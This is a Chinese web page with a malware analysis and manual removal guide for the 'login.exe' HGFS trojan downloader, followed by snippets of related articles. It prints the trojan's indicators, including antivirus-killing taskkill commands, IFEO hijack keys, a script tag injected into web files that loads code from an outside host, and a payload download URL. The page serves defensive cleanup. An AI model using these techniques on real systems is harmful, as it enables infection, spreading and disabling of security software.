login.exe HGFS木马下载器的手动查杀方法

样本信息:File: login.exe
Size: 25428 bytes
Modified: 2008年4月25日, 16:30:08
MD5: 9777E8C79312F2E3D175AA1F64B07C11
SHA1: 4236D76C4FAEFE1CDF22414A25E946E493E0D52E
CRC32: 5A562203

1.病毒初始化:创建互斥量HGFSMUTEX,保证系统内只有一个实例在运行

2.释放如下文件或者副本
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并复制到如下启动文件夹中达到开机启动自身的目的
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\Default User\「开始」菜单\程序\启动\login.exe

3.执行connnet.bat批处理内的内容

a.遍历d~z盘 复制%systemroot%\system32\Autorun.inf和%systemroot%\system32\Autorun.exe到其根目录下

b.判断中毒机器是否处于局域网,如果是则利用ipc漏洞建立一个空连接,并把autorun.exe和%autorun.inf复制到机器的C$下面。

4.IFEO劫持某些杀毒软件
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravstub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravtask.exe
指向c:\\我就不给你启动.exe

5.试图结束360软件
cmd /c taskkill /im 360safe.exe /f
cmd /c taskkill /im 360tray.exe /f

6.遍历所有磁盘删除.gho文件

7.遍历所有磁盘感染asp,htm,html,aspx,php等文件
在其尾部加入<script language=javascript src=http://down.******.cn/1.js></script>的代码

8.链接网络下载木马
http://17vp.cn/down/gr.exe到
C:\Program Files\Internet Explorer\1.exe
但链接已经失效

解决方法:

1.复制如下文字 到剪贴板(假设系统在C盘)
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并复制到如下启动文件夹中达到开机启动自身的目的
C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\login.exe
C:\Documents and Settings\Default User\「开始」菜单\程序\启动\login.exe

打开Xdelbox.exe
在下面的大框中 单击右键 点击 “剪贴板导入不检查路径”
之后刚才复制的那个文件列表将出现在下面的大框中
然后再在下面的大框中单击右键 点击 “立即重启执行删除” 
软件会自动重启计算机

重启计算机以后 会有两个系统进入的选择的倒计时界面
第一个是你原来的windows系统
第二个是这个软件给你设定的dos系统
不用你管,它会自动选择进入第二个系统
类似dos的界面滚动完毕以后 病毒就被删除了
之后他会自动重启进入正常模式

2.打开sreng 启动项目 注册表
删除所有红色的IFEO项目

3.建议屏蔽http://17vp.cn网站

(0)

相关推荐

  • python使用urllib模块开发的多线程豆瓣小站mp3下载器

    复制代码 代码如下: #! /usr/bin/python2.7# -- coding:utf-8 -- import os, urllib,urllib2, thread,threadingimport re #匹配音乐urlreg=re.compile('{"name":"(.+?)".+?"rawUrl":"(.+?)",.+?}', re.I) class downloader(threading.Thread):  

  • 关于WIN32.EXE变态木马下载器的解决办法

    关于WIN32.EXE变态木马下载器的解决办法

    一.WIN32.EXE的来源:http://fdghewrtewrtyrew.biz/adv/130/win32.exe 二.运行后的表现:此WIN32.EXE通过80和8080端口访问若干个IP,若防火墙不能监测到或令防火墙允许该访问,WIN32.EXE会自动下载木马Kernels8.exe到system32目录下:Kernels8.exe自网络下载1.dlb.2.dlb.....等一堆木马到当前用户文件夹中,并自动运行.下载的木马加载运行后,又从网络上下载其它木马/蠕虫. 木马/蠕虫完全下载

  • Android编程开发实现多线程断点续传下载器实例

    Android编程开发实现多线程断点续传下载器实例

    本文实例讲述了Android编程开发实现多线程断点续传下载器.分享给大家供大家参考,具体如下: 使用多线程断点续传下载器在下载的时候多个线程并发可以占用服务器端更多资源,从而加快下载速度,在下载过程中记录每个线程已拷贝数据的数量,如果下载中断,比如无信号断线.电量不足等情况下,这就需要使用到断点续传功能,下次启动时从记录位置继续下载,可避免重复部分的下载.这里采用数据库来记录下载的进度. 效果图:   断点续传 1.断点续传需要在下载过程中记录每条线程的下载进度 2.每次下载开始之前先读取数据库

  • 命令行使用支持断点续传的java多线程下载器

    复制代码 代码如下: package org.load.download; import java.io.File;import java.io.IOException;import java.io.InputStream;import java.io.RandomAccessFile;import java.text.DecimalFormat; import org.apache.http.HttpEntity;import org.apache.http.HttpResponse;impo

  • Python制作CSDN免积分下载器

    Python制作CSDN免积分下载器

    CSDN免积分下载 你懂的. 1.输入资源地址如:http://download.csdn.net/download/gengqkun/4127808 2.输入验证码 3.点击下载,会弹出浏览器下载. 注:成功率在70-80% ,界面很丑,请将就着用. 复制代码 代码如下: #-*-coding:utf-8-*- #python3.3.5 import urllib.parse,urllib.request,http.cookiejar,io,webbrowser import tkinter

  • iOS开发实现下载器的基本功能(1)

    今天,做了一个下载器的Demo,即从本地配置的Apache服务器上,下载指定的文件.这次,我们下载服务器根目录下的html.mp4文件. 按照惯例,我们先创建一个URL对象和请求.  NSURL *url = [NSURL URLWithString:@"http://127.0.0.1/html.mp4"]; NSURLRequest *request = [NSURLRequest requestWithURL:url]; 这里有两点需要注意,第一,这个url的字符串是全英文的,如

  • 替换ctfmon.exe的下载器window.exe的方法

    病毒描述: 此病毒利用替换输入法输入程序的方法伪装自身,从而可以利用原先已有的ctfmon启动项目启动自身,并进行下载木马和感染htm文件等操作 File: window.exe Size: 19380 bytes Modified: 2007年10月19日, 17:42:28 MD5: BDAA1AB926518C7D3C05B730C8B5872C SHA1: BF4C82AA7F169FF37F436B78BBE9AA7FD652118A CRC32: BEC77526 1.病毒运行后,生

  • 利用stream实现一个简单的http下载器

    其实这个http下载器的功能已经相当完善了,支持:限速.post投递和上传.自定义http header.设置user agent.设置range和超时 而且它还不单纯只能下载http,由于使用了stream,所以也支持其他协议,你也可以用它来进行文件之间的copy.纯tcp下载等等.. 完整demo请参考:https://github.com/waruqi/tbox/wiki stream.c /* ///////////////////////////////////////////////

  • php实现的css文件背景图片下载器代码

    本文实例讲述了php实现的css文件背景图片下载器代码.分享给大家供大家参考.具体实现方法如下: 下载css文件里面的背景图片是我们这些盗版份子长期搞的事情,下载个css图片下载器常出现各种广告弹窗,实在扛不住.这里就提供了一个php版的css文件背景图片下载器给大家. 把文件放到php程序目录 dos下面 php.exe cssImages.php 0 http://www.xxxx.com/css/style.css \images\ 先在php程序目录建个images文件夹,呵呵,贴代码:

  • login.exe HGFS木马下载器的手动查杀方法

    样本信息:File: login.exe Size: 25428 bytes Modified: 2008年4月25日, 16:30:08 MD5: 9777E8C79312F2E3D175AA1F64B07C11 SHA1: 4236D76C4FAEFE1CDF22414A25E946E493E0D52E CRC32: 5A562203 1.病毒初始化:创建互斥量HGFSMUTEX,保证系统内只有一个实例在运行 2.释放如下文件或者副本 %systemroot%\system32\Autoru

  • md9.exe scvhost.exe 只木马下载者查杀方法

    从http://www.ittool.cn/d123.exe 下载病毒文件 它使用rar自解压文件,广告,病毒 等很多垃圾软件,很恶心 查杀方法:www.360safe.com 下载即可删除

  • 木马下载器Win32.TrojDownloader.Delf.114688

    木马下载器Win32.TrojDownloader.Delf.114688病毒行为: 该病毒是一个木马下载者,会从网上下载其他病毒至客户的机器上并运行.病毒运行后生衍生一个DLL文件至系统目录中. 1.生成文件 %WinDir%\System32\Downdll.dll 2.修改注册表 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections SavedLegacySetti

  • 木马下载器前仆后继,AOTU病毒群卷土重来(专杀4月15日升级到1.4版)

    以下是这两天极度猖獗的AUTO病毒最新变种的分析报告: 一.行为概述 该EXE是病毒下载器,它会: 1) 参考系统C盘卷序列号来算出服务名,EXE 和DLL 的文件名. 2) 在每一个驱动器下放置AUTO病毒autorun.inf 和自身副本auto.exe 并加系统和隐藏属性. 3) 在系统system32 下放置自身副本"随机名.exe "和释放出来的"随机名.dll" 并将它们伪装成具有隐藏属性的系统文件. 4) 修改系统键值,将系统隐藏文件选项删除,造成用户

  • 伪AVP恶意木马下载器专杀工具下载

    伪AVP恶意木马下载器专杀工具下载

    "伪AVP恶意木马"是一个恶性下载器,通过网页挂马.第三方软件漏洞等手段进入用户电脑,在电脑中疯狂占用系统资源,导致运行速度异常缓慢,并下载Winsys ARP攻击工具来实施ARP攻击,当局域网机器浏览网络时就会造成中毒. 中了"伪AVP恶意木马"的用户能在C盘下看到一个ver.txt的木马下载器,该下载器会创建服务名为WinCom的服务,并大量下载网游盗号木马,严重威胁用户网络虚拟财产的安全. 在360安全中心的百科(http://baike.360.cn)和论坛

  • python动态视频下载器的实现方法

    这里向大家分享一下python爬虫的一些应用,主要是用爬虫配合简单的GUI界面实现视频,音乐和小说的下载器.今天就先介绍如何实现一个动态视频下载器. 爬取电影天堂视频 首先介绍的是python爬取电影天堂网站的视频(包括电影,电视剧,综艺等),主要是用selenium动态网页技术加上简单的爬虫技术. (1)电影网站首页面地址:https://www.dytt8.net/ (2)用到的技术:selenium模拟浏览器运行. (3)首先要安装配置selenium库和不同浏览器和该库配合的插件.这里安

  • 使用 go 实现多线程下载器的方法

    目录 1.多线程下载原理 2.构造一个下载器 2.1 为下载器提供初始化方法 3.实现下载综合调度逻辑 3.1 下载文件分段 3.2 子线程下载函数 4. 保存下载文件函数 5.完整代码 本篇文章我们用Go实现一个简单的多线程下载器. 1.多线程下载原理 通过判断下载文件链接返回头信息中的 Accept-Ranges 字段,如果为 bytes 则表示支持断点续传. 然后在请求头中设置 Range 字段为 bytes=[start]-[end],以请求下载文件的分段部分,然后将所有分段合并为一个完

  • 最新病毒结合auto.exe,游戏盗号木马下载者手工查杀microsofts.vbs

    最新病毒结合auto.exe,游戏盗号木马下载者手工查杀下面是启用病毒的代码microsofts.vbs 复制代码 代码如下: Set Lovecuteqq = CreateObject("Wscript.Shell") Lovecuteqq.run ("C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\microsofts.pif") 木马名称:Trojan-PSW/Win32.OnLineGames.lxt 路径:C:\WINDOWS\sys

随机推荐